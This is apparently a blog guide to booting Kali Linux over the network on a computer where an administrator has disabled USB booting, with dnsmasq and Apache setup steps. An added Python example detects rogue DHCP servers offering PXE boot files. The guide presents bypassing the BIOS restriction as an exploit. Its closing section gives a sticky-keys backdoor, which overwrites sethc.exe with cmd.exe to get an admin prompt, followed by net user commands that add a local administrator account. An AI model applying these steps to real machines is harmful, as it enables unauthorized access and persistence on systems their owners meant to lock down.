Booting Kali Linux over the network when booting via USB is disabled
This guide will cover how to boot Kali Linux over the network. This is useful when booting from USB devices is not possible due to a BIOS security setting but booting over the network is enabled.
Administrators sometimes disable USB devices to increase security, but they keep booting over the network enabled for maintenance purposes. This is what we are going to exploit.
Hardware requirement: at least 4 GB of RAM is mandatory. The image is fetched over the network and then loaded into memory, hence this requirement.
Note that this guide is heavily based on https://docs.kali.org/installation/kali-linux-network-pxe-install and https://www.offensive-security.com/kali-linux/booting-kali-linux-live-http/, but I found that there were some missing steps in it at the end. Hence the effort for this guide. Any Kali doc writers, feel free to take over these steps.
Setup
Connect your Linux machine to the computer you want to boot Kali on. Assign the IP 192.168.101.1 to your Linux machine.
First, we need to install dnsmasq to provide the DHCP/TFTP server and then edit the dnsmasq.conf file.
apt-get install dnsmasq
nano /etc/dnsmasq.conf
In dnsmasq.conf, enable DHCP, TFTP and PXE booting and set the dhcp-range to match your environment. If needed you can also define your gateway and DNS servers with the dhcp-option directive as shown below:
interface=eth0
dhcp-range=192.168.101.100,192.168.101.110,24h
dhcp-boot=pxelinux.0
enable-tftp
tftp-root=/tftpboot/
dhcp-option=3,192.168.101.1
dhcp-option=6,8.8.8.8,8.8.4.4
If you are using different settings, make sure that the IP in “dhcp-option=3,” is the IP of your Linux machine. Your computer acts as a DHCP server.
With the edits in place, the dnsmasq service needs to be restarted in order for the changes to take effect.
service dnsmasq restart
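Seen from the network owner's side, the dnsmasq settings above amount to an unapproved DHCP server handing out a PXE boot file. The following is an added example, not part of the original guide: a Python check that parses a raw DHCP payload and flags OFFER/ACK replies from servers outside an approved list. The function names, the approved-server set and the sample packet are hypothetical and constructed for illustration.

```python
import socket
import struct

MAGIC = b"\x63\x82\x53\x63"  # RFC 2131 cookie that precedes the options area

def parse_dhcp(pkt: bytes) -> dict:
    """Pull the PXE-relevant fields out of a raw BOOTP/DHCP payload."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC:
        raise ValueError("not a DHCP message")
    msg = {"op": pkt[0],
           "siaddr": socket.inet_ntoa(pkt[20:24]),  # next-server (TFTP host)
           "file": pkt[108:236].split(b"\0", 1)[0].decode("ascii", "replace"),
           "options": {}}
    i = 240
    while i < len(pkt) and pkt[i] != 255:           # 255 = end option
        if pkt[i] == 0:                             # 0 = pad, no length byte
            i += 1
            continue
        if i + 1 >= len(pkt) or i + 2 + pkt[i + 1] > len(pkt):
            raise ValueError("truncated option")
        msg["options"][pkt[i]] = pkt[i + 2:i + 2 + pkt[i + 1]]
        i += 2 + pkt[i + 1]
    return msg

def rogue_pxe_findings(pkt: bytes, approved: set) -> list:
    """Flag OFFER/ACK replies from servers outside the approved set."""
    msg = parse_dhcp(pkt)
    opts = msg["options"]
    if msg["op"] != 2 or opts.get(53) not in (b"\x02", b"\x05"):
        return []                                   # not a server OFFER/ACK
    sid = opts.get(54, b"")                         # option 54 = server identifier
    server = socket.inet_ntoa(sid) if len(sid) == 4 else msg["siaddr"]
    if server in approved:
        return []
    findings = [f"DHCP reply from unapproved server {server}"]
    boot = opts.get(67, b"").rstrip(b"\0").decode("ascii", "replace") or msg["file"]
    if boot:                                        # option 67 or BOOTP file field
        findings.append(f"{server} offers boot file {boot!r}, next-server {msg['siaddr']}")
    return findings

def sample_offer(server: str, bootfile: str) -> bytes:
    """Constructed DHCPOFFER resembling what the dnsmasq.conf above would send."""
    ip = socket.inet_aton
    hdr = struct.pack("!BBBBIHH", 2, 1, 6, 0, 0x1234ABCD, 0, 0)
    hdr += ip("0.0.0.0") + ip("192.168.101.100") + ip(server) + ip("0.0.0.0")
    hdr += bytes.fromhex("020000000001").ljust(16, b"\0") + b"\0" * 64
    hdr += bootfile.encode().ljust(128, b"\0")
    opts = b"\x35\x01\x02" + b"\x36\x04" + ip(server) + b"\x03\x04" + ip(server) + b"\xff"
    return hdr + MAGIC + opts
```

Calling rogue_pxe_findings(sample_offer("192.168.101.1", "pxelinux.0"), {"10.0.0.5"}) returns two findings; with 192.168.101.1 in the approved set it returns none.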
Now, we need to create a directory to hold the Kali Netboot image and download the image we wish to serve from the Kali repos.
mkdir -p /tftpboot
cd /tftpboot
# for 64 bit systems:
wget http://repo.kali.org/kali/dists/kali-rolling/main/installer-amd64/current/images/netboot/netboot.tar.gz
# for 32 bit systems:
wget http://repo.kali.org/kali/dists/kali-rolling/main/installer-i386/current/images/netboot/netboot.tar.gz
tar zxpf netboot.tar.gz
rm netboot.tar.gz
Also make sure to download the ISO from (if you haven’t done this yet): https://www.kali.org/downloads/
If you used the 32 bit version in the previous step, take the 32 bit ISO here as well. The same goes for the 64 bit version. You can take the normal ISO.
We’ll have the initial kernel boot via PXE and we will obtain the kernel, initrd, and squashfs filesystem we need for this from a full Kali Linux release ISO from within the “live” directory. We copy the initrd and kernel into the TFTP root folder, while the squashfs file goes into the web root:
mkdir /mnt/iso
mount -o loop kali-linux-2017.3-amd64.iso /mnt/iso/
cp /mnt/iso/live/{initrd.img,vmlinuz} /tftpboot/
cp /mnt/iso/live/filesystem.squashfs /var/www/html/
service apache2 stop && service apache2 start
Now go to the boot options of the computer and select the Onboard NIC (Network Interface Controller):
You will now boot over the network and will be presented with this screen:
Select the Help option.
Now you are able to enter the following command:
vmlinuz initrd=initrd.img append boot=live components fetch=http://your.ip.comes.here/filesystem.squashfs
Press enter. You will see something like this:
Now you are booted into Kali.
If not, make sure your Apache server is set up correctly and the IPs you used are correct.
Further steps
You can copy c:\windows\system32\cmd.exe to c:\windows\system32\sethc.exe (overwrite). This will spawn an admin command prompt on the Windows computer.
You will be able to create a new admin account on the computer like this:
net user /add [username] [password]
net localgroup administrators [username] /add